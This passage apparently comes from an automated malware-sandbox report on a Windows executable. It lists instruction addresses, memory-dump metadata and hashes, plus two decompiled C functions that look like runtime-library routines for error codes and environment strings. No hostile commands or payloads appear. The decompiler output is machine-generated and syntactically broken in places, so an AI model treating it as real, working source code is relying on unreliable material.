                                                                                                                                                                                                                                                        0x7ff6e5ac2e0e
                                                                                                                                                                                                                                                        0x7ff6e5ac2e1c
                                                                                                                                                                                                                                                        0x7ff6e5ac2e22
                                                                                                                                                                                                                                                        0x7ff6e5ac2e24
                                                                                                                                                                                                                                                        0x7ff6e5ac2e29
                                                                                                                                                                                                                                                        0x7ff6e5ac2e2b
                                                                                                                                                                                                                                                        0x7ff6e5ac2e2f
                                                                                                                                                                                                                                                        0x7ff6e5ac2e3e
                                                                                                                                                                                                                                                        0x7ff6e5ac2e44
                                                                                                                                                                                                                                                        0x7ff6e5ac2e46
                                                                                                                                                                                                                                                        0x7ff6e5ac2e49
                                                                                                                                                                                                                                                        0x7ff6e5ac2e4b
                                                                                                                                                                                                                                                        0x7ff6e5ac2e4f
                                                                                                                                                                                                                                                        0x7ff6e5ac2e53
                                                                                                                                                                                                                                                        0x7ff6e5ac2e59
                                                                                                                                                                                                                                                        0x7ff6e5ac2e5c
                                                                                                                                                                                                                                                        0x7ff6e5ac2e6a
                                                                                                                                                                                                                                                        0x7ff6e5ac2e75
                                                                                                                                                                                                                                                        0x7ff6e5ac2e79
                                                                                                                                                                                                                                                        0x7ff6e5ac2e81
                                                                                                                                                                                                                                                        0x7ff6e5ac2e83
                                                                                                                                                                                                                                                        0x7ff6e5ac2e89
                                                                                                                                                                                                                                                        0x7ff6e5ac2e8f
                                                                                                                                                                                                                                                        0x7ff6e5ac2e93
                                                                                                                                                                                                                                                        0x7ff6e5ac2e96
                                                                                                                                                                                                                                                        0x7ff6e5ac2e9b
                                                                                                                                                                                                                                                        0x7ff6e5ac2ea8
                                                                                                                                                                                                                                                        0x7ff6e5ac2ead
                                                                                                                                                                                                                                                        0x7ff6e5ac2ebc
                                                                                                                                                                                                                                                        0x7ff6e5ac2ec4
                                                                                                                                                                                                                                                        0x7ff6e5ac2ec6
                                                                                                                                                                                                                                                        0x7ff6e5ac2ecb
                                                                                                                                                                                                                                                        0x7ff6e5ac2ecf
                                                                                                                                                                                                                                                        0x7ff6e5ac2eda
                                                                                                                                                                                                                                                        0x7ff6e5ac2ee0
                                                                                                                                                                                                                                                        0x7ff6e5ac2ee4
                                                                                                                                                                                                                                                        0x7ff6e5ac2ee9
                                                                                                                                                                                                                                                        0x7ff6e5ac2eeb
                                                                                                                                                                                                                                                        0x7ff6e5ac2ef0
                                                                                                                                                                                                                                                        0x7ff6e5ac2ef2
                                                                                                                                                                                                                                                        0x7ff6e5ac2efc
                                                                                                                                                                                                                                                        0x7ff6e5ac2f03
                                                                                                                                                                                                                                                        0x7ff6e5ac2f0c
                                                                                                                                                                                                                                                        0x7ff6e5ac2f0e
                                                                                                                                                                                                                                                        0x7ff6e5ac2f14
                                                                                                                                                                                                                                                        0x7ff6e5ac2f1a
                                                                                                                                                                                                                                                        0x7ff6e5ac2f24
                                                                                                                                                                                                                                                        0x7ff6e5ac2f2a
                                                                                                                                                                                                                                                        0x7ff6e5ac2f32
                                                                                                                                                                                                                                                        0x7ff6e5ac2f37
                                                                                                                                                                                                                                                        0x7ff6e5ac2f3c
                                                                                                                                                                                                                                                        0x7ff6e5ac2f47
                                                                                                                                                                                                                                                        0x7ff6e5ac2f4d
                                                                                                                                                                                                                                                        0x7ff6e5ac2f59
                                                                                                                                                                                                                                                        0x7ff6e5ac2f6d
                                                                                                                                                                                                                                                        0x7ff6e5ac2f6f
                                                                                                                                                                                                                                                        0x7ff6e5ac2f72
                                                                                                                                                                                                                                                        0x7ff6e5ac2f80
                                                                                                                                                                                                                                                        0x7ff6e5ac2f86
                                                                                                                                                                                                                                                        0x7ff6e5ac2f88
                                                                                                                                                                                                                                                        0x7ff6e5ac2f8a
                                                                                                                                                                                                                                                        0x7ff6e5ac2f8c
                                                                                                                                                                                                                                                        0x7ff6e5ac2f8f
                                                                                                                                                                                                                                                        0x7ff6e5ac2f91
                                                                                                                                                                                                                                                        0x7ff6e5ac2f93
                                                                                                                                                                                                                                                        0x7ff6e5ac2f9d
                                                                                                                                                                                                                                                        0x7ff6e5ac2fa4
                                                                                                                                                                                                                                                        0x7ff6e5ac2fab
                                                                                                                                                                                                                                                        0x7ff6e5ac2fb2
                                                                                                                                                                                                                                                        0x7ff6e5ac2fb4
                                                                                                                                                                                                                                                        0x7ff6e5ac2fba
                                                                                                                                                                                                                                                        0x7ff6e5ac2fbe
                                                                                                                                                                                                                                                        0x7ff6e5ac2fc8
                                                                                                                                                                                                                                                        0x7ff6e5ac2fca
                                                                                                                                                                                                                                                        0x7ff6e5ac2fcf
                                                                                                                                                                                                                                                        0x7ff6e5ac2fd1
                                                                                                                                                                                                                                                        0x7ff6e5ac2fdc
                                                                                                                                                                                                                                                        0x7ff6e5ac2fe2
                                                                                                                                                                                                                                                        0x7ff6e5ac2fe6
                                                                                                                                                                                                                                                        0x7ff6e5ac2fe8
                                                                                                                                                                                                                                                        0x7ff6e5ac2feb
                                                                                                                                                                                                                                                        0x7ff6e5ac2ff4
                                                                                                                                                                                                                                                        0x7ff6e5ac2ff8
                                                                                                                                                                                                                                                        0x7ff6e5ac2fff
                                                                                                                                                                                                                                                        0x7ff6e5ac3004
                                                                                                                                                                                                                                                        0x7ff6e5ac3009
                                                                                                                                                                                                                                                        0x7ff6e5ac300e
                                                                                                                                                                                                                                                        0x7ff6e5ac3010
                                                                                                                                                                                                                                                        0x7ff6e5ac3015
                                                                                                                                                                                                                                                        0x7ff6e5ac3017
                                                                                                                                                                                                                                                        0x7ff6e5ac3021
                                                                                                                                                                                                                                                        0x7ff6e5ac3028
                                                                                                                                                                                                                                                        0x7ff6e5ac3031
                                                                                                                                                                                                                                                        0x7ff6e5ac3033
                                                                                                                                                                                                                                                        0x7ff6e5ac3039
                                                                                                                                                                                                                                                        0x7ff6e5ac3067

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $
                                                                                                                                                                                                                                                        • API String ID: 0-227171996
                                                                                                                                                                                                                                                        • Opcode ID: 2d8c388a4af4e59f7aa018185c24a80b808f927c20487c79df8fa8b9671cd73b
                                                                                                                                                                                                                                                        • Instruction ID: e4d1a54a28839b2acf85887bfd64b52389cbcc2dbc83d91ffe7bf15a5a745a68
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d8c388a4af4e59f7aa018185c24a80b808f927c20487c79df8fa8b9671cd73b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34E1A533B0864681EB69CA1D806027927A1FF95F48F144135DA8ECB794DF3BEC51C74A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACD098(void* __ebp, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32, long long _a64) {
                                                                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                                                                        				long long _t32;
                                                                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t46 = _t42;
                                                                                                                                                                                                                                                        				 *((long long*)(_t46 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t46 + 0x10)) = __rbp;
                                                                                                                                                                                                                                                        				 *((long long*)(_t46 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t46 + 0x20)) = __rdi;
                                                                                                                                                                                                                                                        				r13b = r9b;
                                                                                                                                                                                                                                                        				_t16 =  >  ? __ebp : 0;
                                                                                                                                                                                                                                                        				_t17 = ( >  ? __ebp : 0) + 9;
                                                                                                                                                                                                                                                        				if (__rdx - __rax > 0) goto 0xe5acd120;
                                                                                                                                                                                                                                                        				_t32 = _a64;
                                                                                                                                                                                                                                                        				 *((long long*)(_t46 - 0x20)) = _t32;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				 *(_t46 - 0x28) =  *(_t46 - 0x28) & 0x00000000;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *((char*)(_t32 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t32 + 0x2c)) = 0x22;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4(__rax, __rbx, _t32, __rdx, __rsi, r8d, _t45);
                                                                                                                                                                                                                                                        				return 0x22;
                                                                                                                                                                                                                                                        			}








                                                                                                                                                                                                                                                        0x7ff6e5acd098
                                                                                                                                                                                                                                                        0x7ff6e5acd09b
                                                                                                                                                                                                                                                        0x7ff6e5acd09f
                                                                                                                                                                                                                                                        0x7ff6e5acd0a3
                                                                                                                                                                                                                                                        0x7ff6e5acd0a7
                                                                                                                                                                                                                                                        0x7ff6e5acd0bd
                                                                                                                                                                                                                                                        0x7ff6e5acd0c6
                                                                                                                                                                                                                                                        0x7ff6e5acd0c9
                                                                                                                                                                                                                                                        0x7ff6e5acd0d1
                                                                                                                                                                                                                                                        0x7ff6e5acd0d3
                                                                                                                                                                                                                                                        0x7ff6e5acd0e0
                                                                                                                                                                                                                                                        0x7ff6e5acd0e4
                                                                                                                                                                                                                                                        0x7ff6e5acd0e7
                                                                                                                                                                                                                                                        0x7ff6e5acd0ec
                                                                                                                                                                                                                                                        0x7ff6e5acd0f1
                                                                                                                                                                                                                                                        0x7ff6e5acd0f5
                                                                                                                                                                                                                                                        0x7ff6e5acd0fa
                                                                                                                                                                                                                                                        0x7ff6e5acd11f

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                                                                                                        • API String ID: 0-3030954782
                                                                                                                                                                                                                                                        • Opcode ID: e8ad3313ac50deca76865dcff50c63e8317fb702a62c77948e89599ff08dba86
                                                                                                                                                                                                                                                        • Instruction ID: f71cf4ae0b35477bba565b8ea545f6cb34263d765cb0f534517f30edf0b54c29
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e8ad3313ac50deca76865dcff50c63e8317fb702a62c77948e89599ff08dba86
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F513A23B182C546E7248B399860769BBD1EB44F94F48D231CB68CBAC5DF3EE845C706
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACFA08(void* __ecx, intOrPtr __edx, void* __ebp, signed long long __rax, long long __rbx, signed long long __rcx, void* __rdx, void* __r9, signed char _a8, intOrPtr _a16, long long _a24) {
                                                                                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                                                                        				void* _t84;
                                                                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                                                                                        				void* _t92;
                                                                                                                                                                                                                                                        				void* _t93;
                                                                                                                                                                                                                                                        				signed long long _t114;
                                                                                                                                                                                                                                                        				intOrPtr _t116;
                                                                                                                                                                                                                                                        				signed long long _t118;
                                                                                                                                                                                                                                                        				intOrPtr* _t121;
                                                                                                                                                                                                                                                        				intOrPtr* _t124;
                                                                                                                                                                                                                                                        				signed long long _t130;
                                                                                                                                                                                                                                                        				signed long long _t132;
                                                                                                                                                                                                                                                        				signed long long _t133;
                                                                                                                                                                                                                                                        				void* _t159;
                                                                                                                                                                                                                                                        				long long _t164;
                                                                                                                                                                                                                                                        				signed long long _t165;
                                                                                                                                                                                                                                                        				signed long long _t166;
                                                                                                                                                                                                                                                        				void* _t174;
                                                                                                                                                                                                                                                        				void* _t175;
                                                                                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                                                                                        				signed long long _t178;
                                                                                                                                                                                                                                                        				signed long long _t179;
                                                                                                                                                                                                                                                        				signed long long _t181;
                                                                                                                                                                                                                                                        				signed long long _t183;
                                                                                                                                                                                                                                                        				intOrPtr* _t184;
                                                                                                                                                                                                                                                        				long long _t188;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t123 = __rbx;
                                                                                                                                                                                                                                                        				_t114 = __rax;
                                                                                                                                                                                                                                                        				_a24 = __rbx;
                                                                                                                                                                                                                                                        				_a16 = __edx;
                                                                                                                                                                                                                                                        				_t188 = __rcx;
                                                                                                                                                                                                                                                        				if (__rcx != 0) goto 0xe5acfa3c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(__rax);
                                                                                                                                                                                                                                                        				 *__rax = 0x16;
                                                                                                                                                                                                                                                        				goto 0xe5acfd2f;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC598(__ecx, 0x3d, __rcx, __rcx, __rdx, __r9);
                                                                                                                                                                                                                                                        				_t178 = _t114;
                                                                                                                                                                                                                                                        				if (_t114 == 0) goto 0xe5acfd1c;
                                                                                                                                                                                                                                                        				if (_t114 == __rcx) goto 0xe5acfd1c;
                                                                                                                                                                                                                                                        				_t179 =  *0xe5afc9b0; // 0x0
                                                                                                                                                                                                                                                        				_t84 = _t179 -  *0xe5afc9c8; // 0x0
                                                                                                                                                                                                                                                        				bpl =  *(_t114 + 1);
                                                                                                                                                                                                                                                        				_a8 = bpl;
                                                                                                                                                                                                                                                        				if (_t84 != 0) goto 0xe5acfa89;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD00C4(__rbx, _t179, __rcx, _t164);
                                                                                                                                                                                                                                                        				 *0xe5afc9b0 = _t114;
                                                                                                                                                                                                                                                        				r12d = 1;
                                                                                                                                                                                                                                                        				if (_t114 != 0) goto 0xe5acfb62;
                                                                                                                                                                                                                                                        				if (__edx == 0) goto 0xe5acfaf1;
                                                                                                                                                                                                                                                        				_t87 =  *0xe5afc9b8 - _t164; // 0x1e5fc5382a0
                                                                                                                                                                                                                                                        				if (_t87 == 0) goto 0xe5acfaf1;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC8518(_t179, __rcx, _t164);
                                                                                                                                                                                                                                                        				if (_t114 != 0) goto 0xe5acfacd;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t114);
                                                                                                                                                                                                                                                        				 *_t114 = 0x16;
                                                                                                                                                                                                                                                        				_t166 = _t165 | 0xffffffff;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t114, __rcx);
                                                                                                                                                                                                                                                        				goto 0xe5acfd33;
                                                                                                                                                                                                                                                        				_t181 =  *0xe5afc9b0; // 0x0
                                                                                                                                                                                                                                                        				_t89 = _t181 -  *0xe5afc9c8; // 0x0
                                                                                                                                                                                                                                                        				if (_t89 != 0) goto 0xe5acfb59;
                                                                                                                                                                                                                                                        				_t40 = E00007FF67FF6E5AD00C4(_t123, _t181, __rcx, _t164);
                                                                                                                                                                                                                                                        				 *0xe5afc9b0 = _t114;
                                                                                                                                                                                                                                                        				goto 0xe5acfb59;
                                                                                                                                                                                                                                                        				if (bpl == 0) goto 0xe5acfc12;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACDD40(_t40, _t175, __rdx);
                                                                                                                                                                                                                                                        				 *0xe5afc9b0 = _t114;
                                                                                                                                                                                                                                                        				_t42 = E00007FF67FF6E5AC9E18(_t114, _t175);
                                                                                                                                                                                                                                                        				_t183 =  *0xe5afc9b0; // 0x0
                                                                                                                                                                                                                                                        				if (_t183 == 0) goto 0xe5acfaba;
                                                                                                                                                                                                                                                        				_t92 =  *0xe5afc9b8 - _t164; // 0x1e5fc5382a0
                                                                                                                                                                                                                                                        				if (_t92 != 0) goto 0xe5acfb59;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACDD40(_t42, _t175, __rdx);
                                                                                                                                                                                                                                                        				 *0xe5afc9b8 = _t114;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t114, _t175);
                                                                                                                                                                                                                                                        				_t93 =  *0xe5afc9b8 - _t164; // 0x1e5fc5382a0
                                                                                                                                                                                                                                                        				if (_t93 == 0) goto 0xe5acfaba;
                                                                                                                                                                                                                                                        				_t184 =  *0xe5afc9b0; // 0x0
                                                                                                                                                                                                                                                        				if (_t184 == 0) goto 0xe5acfaba;
                                                                                                                                                                                                                                                        				_t177 = _t178 - __rcx;
                                                                                                                                                                                                                                                        				_t124 = _t184;
                                                                                                                                                                                                                                                        				if ( *_t184 == 0) goto 0xe5acfba7;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD64AC(_t76, _t124, __rcx,  *_t184, _t164, _t166, _t177, __r9) != 0) goto 0xe5acfb95;
                                                                                                                                                                                                                                                        				_t116 =  *_t124;
                                                                                                                                                                                                                                                        				if ( *((char*)(_t177 + _t116)) == 0x3d) goto 0xe5acfb9e;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t177 + _t116)) == sil) goto 0xe5acfb9e;
                                                                                                                                                                                                                                                        				goto 0xe5acfb6e;
                                                                                                                                                                                                                                                        				goto 0xe5acfbb1;
                                                                                                                                                                                                                                                        				_t130 =  ~((_t124 + 8 - _t184 >> 3) - _t184 >> 3);
                                                                                                                                                                                                                                                        				if (_t130 < 0) goto 0xe5acfc0d;
                                                                                                                                                                                                                                                        				if ( *_t184 == _t164) goto 0xe5acfc0d;
                                                                                                                                                                                                                                                        				_t46 = E00007FF67FF6E5AC9E18( *((intOrPtr*)(_t124 + 8)),  *(_t184 + _t130 * 8));
                                                                                                                                                                                                                                                        				if (bpl == 0) goto 0xe5acfbde;
                                                                                                                                                                                                                                                        				 *(_t184 + _t130 * 8) = __rcx;
                                                                                                                                                                                                                                                        				goto 0xe5acfc6d;
                                                                                                                                                                                                                                                        				_t118 =  *((intOrPtr*)(_t184 + 8 + _t130 * 8));
                                                                                                                                                                                                                                                        				 *(_t184 + _t130 * 8) = _t118;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t184 + (_t130 + 1) * 8)) != _t164) goto 0xe5acfbd2;
                                                                                                                                                                                                                                                        				r8d = 8;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD24FC(_t46, _t130 + 1, _t184, _t130 + 1, _t164, _t166, _t177);
                                                                                                                                                                                                                                                        				_t132 = _t118;
                                                                                                                                                                                                                                                        				_t48 = E00007FF67FF6E5AC9E18(_t118, _t184);
                                                                                                                                                                                                                                                        				if (_t132 == 0) goto 0xe5acfc70;
                                                                                                                                                                                                                                                        				 *0xe5afc9b0 = _t132;
                                                                                                                                                                                                                                                        				goto 0xe5acfc70;
                                                                                                                                                                                                                                                        				if (bpl != 0) goto 0xe5acfc19;
                                                                                                                                                                                                                                                        				goto 0xe5acfabe;
                                                                                                                                                                                                                                                        				_t133 =  ~_t132;
                                                                                                                                                                                                                                                        				_t18 = _t133 + 2; // 0x2
                                                                                                                                                                                                                                                        				_t159 = _t18;
                                                                                                                                                                                                                                                        				if (_t159 - _t133 < 0) goto 0xe5acfaba;
                                                                                                                                                                                                                                                        				if (_t159 - 0xffffffff >= 0) goto 0xe5acfaba;
                                                                                                                                                                                                                                                        				r8d = 8;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD24FC(_t48, _t133, _t184, _t159, _t164, _t166, _t177);
                                                                                                                                                                                                                                                        				_t50 = E00007FF67FF6E5AC9E18(0xffffffff, _t184);
                                                                                                                                                                                                                                                        				if (0xffffffff == 0) goto 0xe5acfaba;
                                                                                                                                                                                                                                                        				 *((long long*)(0xffffffff + _t133 * 8)) = _t188;
                                                                                                                                                                                                                                                        				 *((long long*)(0xffffffff + 8 + _t133 * 8)) = _t164;
                                                                                                                                                                                                                                                        				 *0xe5afc9b0 = 0xffffffff;
                                                                                                                                                                                                                                                        				if (_a16 == 0) goto 0xe5acfd10;
                                                                                                                                                                                                                                                        				_t187 = (_t166 | 0xffffffff) + 1;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t188 + (_t166 | 0xffffffff) + 1)) != sil) goto 0xe5acfc81;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACDD40(_t50, (_t166 | 0xffffffff) + 3, _t159);
                                                                                                                                                                                                                                                        				if (0xffffffff != 0) goto 0xe5acfca9;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(0xffffffff, (_t166 | 0xffffffff) + 3);
                                                                                                                                                                                                                                                        				goto 0xe5acfcfc;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AC91AC(0xffffffff, 0xffffffff, _t187 + 2, _t188) != 0) goto 0xe5acfd4b;
                                                                                                                                                                                                                                                        				_t28 = _t178 + 1; // 0x1
                                                                                                                                                                                                                                                        				_t121 = 0xffffffff - _t188;
                                                                                                                                                                                                                                                        				_a8 =  ~_a8;
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t121 + _t178)) = sil;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD65C4(0, E00007FF67FF6E5AC91AC(0xffffffff, 0xffffffff, _t187 + 2, _t188), 0xffffffff, 0xffffffff, _t187 + 0x00000002 & _t28 + _t121, _t164, _t164, _t188, __r9, _t174) != 0) goto 0xe5acfd08;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t121);
                                                                                                                                                                                                                                                        				 *_t121 = 0x2a;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t121, 0xffffffff);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t121, _t164);
                                                                                                                                                                                                                                                        				goto 0xe5acfd33;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t121, 0xffffffff);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t121, _t164);
                                                                                                                                                                                                                                                        				goto 0xe5acfd33;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t121);
                                                                                                                                                                                                                                                        				 *_t121 = 0x16;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5AC9E18(_t121, _t188);
                                                                                                                                                                                                                                                        			}






































                                                                                                                                                                                                                                                        0x7ff6e5acfa08
                                                                                                                                                                                                                                                        0x7ff6e5acfa08
                                                                                                                                                                                                                                                        0x7ff6e5acfa08
                                                                                                                                                                                                                                                        0x7ff6e5acfa0d
                                                                                                                                                                                                                                                        0x7ff6e5acfa24
                                                                                                                                                                                                                                                        0x7ff6e5acfa2a
                                                                                                                                                                                                                                                        0x7ff6e5acfa2c
                                                                                                                                                                                                                                                        0x7ff6e5acfa31
                                                                                                                                                                                                                                                        0x7ff6e5acfa37
                                                                                                                                                                                                                                                        0x7ff6e5acfa44
                                                                                                                                                                                                                                                        0x7ff6e5acfa49
                                                                                                                                                                                                                                                        0x7ff6e5acfa4f
                                                                                                                                                                                                                                                        0x7ff6e5acfa58
                                                                                                                                                                                                                                                        0x7ff6e5acfa5e
                                                                                                                                                                                                                                                        0x7ff6e5acfa65
                                                                                                                                                                                                                                                        0x7ff6e5acfa6c
                                                                                                                                                                                                                                                        0x7ff6e5acfa70
                                                                                                                                                                                                                                                        0x7ff6e5acfa75
                                                                                                                                                                                                                                                        0x7ff6e5acfa7a
                                                                                                                                                                                                                                                        0x7ff6e5acfa82
                                                                                                                                                                                                                                                        0x7ff6e5acfa89
                                                                                                                                                                                                                                                        0x7ff6e5acfa92
                                                                                                                                                                                                                                                        0x7ff6e5acfa9a
                                                                                                                                                                                                                                                        0x7ff6e5acfa9c
                                                                                                                                                                                                                                                        0x7ff6e5acfaa3
                                                                                                                                                                                                                                                        0x7ff6e5acfaa5
                                                                                                                                                                                                                                                        0x7ff6e5acfaad
                                                                                                                                                                                                                                                        0x7ff6e5acfaaf
                                                                                                                                                                                                                                                        0x7ff6e5acfab4
                                                                                                                                                                                                                                                        0x7ff6e5acfaba
                                                                                                                                                                                                                                                        0x7ff6e5acfac1
                                                                                                                                                                                                                                                        0x7ff6e5acfac8
                                                                                                                                                                                                                                                        0x7ff6e5acfacd
                                                                                                                                                                                                                                                        0x7ff6e5acfad4
                                                                                                                                                                                                                                                        0x7ff6e5acfadb
                                                                                                                                                                                                                                                        0x7ff6e5acfae0
                                                                                                                                                                                                                                                        0x7ff6e5acfae8
                                                                                                                                                                                                                                                        0x7ff6e5acfaef
                                                                                                                                                                                                                                                        0x7ff6e5acfaf4
                                                                                                                                                                                                                                                        0x7ff6e5acfb02
                                                                                                                                                                                                                                                        0x7ff6e5acfb09
                                                                                                                                                                                                                                                        0x7ff6e5acfb10
                                                                                                                                                                                                                                                        0x7ff6e5acfb15
                                                                                                                                                                                                                                                        0x7ff6e5acfb1f
                                                                                                                                                                                                                                                        0x7ff6e5acfb21
                                                                                                                                                                                                                                                        0x7ff6e5acfb28
                                                                                                                                                                                                                                                        0x7ff6e5acfb32
                                                                                                                                                                                                                                                        0x7ff6e5acfb39
                                                                                                                                                                                                                                                        0x7ff6e5acfb40
                                                                                                                                                                                                                                                        0x7ff6e5acfb45
                                                                                                                                                                                                                                                        0x7ff6e5acfb4c
                                                                                                                                                                                                                                                        0x7ff6e5acfb52
                                                                                                                                                                                                                                                        0x7ff6e5acfb5c
                                                                                                                                                                                                                                                        0x7ff6e5acfb68
                                                                                                                                                                                                                                                        0x7ff6e5acfb6b
                                                                                                                                                                                                                                                        0x7ff6e5acfb71
                                                                                                                                                                                                                                                        0x7ff6e5acfb83
                                                                                                                                                                                                                                                        0x7ff6e5acfb85
                                                                                                                                                                                                                                                        0x7ff6e5acfb8d
                                                                                                                                                                                                                                                        0x7ff6e5acfb93
                                                                                                                                                                                                                                                        0x7ff6e5acfb9c
                                                                                                                                                                                                                                                        0x7ff6e5acfba5
                                                                                                                                                                                                                                                        0x7ff6e5acfbae
                                                                                                                                                                                                                                                        0x7ff6e5acfbb4
                                                                                                                                                                                                                                                        0x7ff6e5acfbb9
                                                                                                                                                                                                                                                        0x7ff6e5acfbbf
                                                                                                                                                                                                                                                        0x7ff6e5acfbc7
                                                                                                                                                                                                                                                        0x7ff6e5acfbc9
                                                                                                                                                                                                                                                        0x7ff6e5acfbcd
                                                                                                                                                                                                                                                        0x7ff6e5acfbd2
                                                                                                                                                                                                                                                        0x7ff6e5acfbd7
                                                                                                                                                                                                                                                        0x7ff6e5acfbe2
                                                                                                                                                                                                                                                        0x7ff6e5acfbe4
